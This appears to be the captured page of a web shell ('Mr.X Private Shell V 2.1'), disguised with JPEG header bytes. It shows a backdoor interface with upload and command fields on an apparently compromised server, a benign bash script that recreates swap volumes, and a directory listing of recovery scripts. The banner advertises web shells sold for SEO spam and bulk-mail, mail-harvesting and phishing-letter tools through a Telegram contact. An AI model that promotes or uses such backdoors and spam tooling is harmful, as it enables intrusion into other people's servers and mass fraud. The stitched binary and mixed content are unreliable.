����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# Code to recreate a swap volume.

# Test for features in mkswap.
# True if mkswap supports the -U option.
FEATURE_MKSWAP_UUID=

mkswap_version=$(get_version mkswap --version)
if version_newer "$mkswap_version" 2.13.1.1; then
    FEATURE_MKSWAP_UUID="y"
fi


create_swap() {
    local swap device uuid label junk
    read swap device uuid label junk < <(grep "^swap ${1#swap:} " "$LAYOUT_FILE")

    if [[ "$FEATURE_MKSWAP_UUID" && -n "${uuid#uuid=}" ]] ; then
        uuid="-U ${uuid#uuid=} "
    else
        uuid=""
    fi

    if [[ -n "${label#label=}" ]] ; then
        label="-L ${label#label=} "
    else
        label=""
    fi

    (
    echo "LogPrint \"Creating swap on $device\""
    echo "mkswap ${uuid}${label}${device} >&2"
    ) >> "$LAYOUT_CODE"
}

Filemanager

Name Type Size Permission Actions
100_include_partition_code.sh File 16.2 KB 0644
110_include_lvm_code.sh File 10.99 KB 0644
120_include_raid_code.sh File 5.3 KB 0644
131_include_filesystem_code.sh File 17.69 KB 0644
133_include_mount_filesystem_code.sh File 11.44 KB 0644
135_include_btrfs_subvolumes_generic_code.sh File 7.24 KB 0644
136_include_btrfs_subvolumes_SLES_code.sh File 29.37 KB 0644
140_include_swap_code.sh File 766 B 0644
150_include_drbd_code.sh File 2.3 KB 0644
160_include_luks_code.sh File 7.83 KB 0644
170_include_hpraid_code.sh File 2.06 KB 0644
180_include_opaldisk_code.sh File 2.89 KB 0644
210_load_multipath.sh File 6.3 KB 0644